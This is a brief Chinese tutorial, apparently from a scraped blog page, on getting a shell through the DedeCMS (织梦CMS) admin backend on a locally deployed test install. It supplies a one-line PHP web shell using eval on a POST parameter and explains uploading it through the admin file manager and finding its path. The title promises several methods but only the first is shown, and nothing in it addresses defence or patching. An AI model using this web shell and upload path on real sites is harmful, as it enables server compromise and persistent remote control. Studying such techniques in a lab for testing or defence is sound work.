DedeCMS织梦CMS 后台getshell的几种方法

准备工作

1.织梦CMS

下载地址:http://www.dedecms.com/

2.lamp/xamp/wamp环境
3.在本地服务器部署织梦CMS
4.访问织梦CMS后台

127.0.0.1/*/dede/

DedeCMS织梦CMS 后台getshell的几种方法_第1张图片
5.准备一句话木马文件
新建一个.PHP文件,写入如下语句。

 @eval($_POST['cmd']); ?>

方法一

利用织梦后台文件可直接上传的机制。
即附件管理-文件式管理器-文件上传功能
完成一句话木马的上传。且文件真实路径可在文件管理器中查到。

你可能感兴趣的:(DedeCMS织梦CMS 后台getshell的几种方法)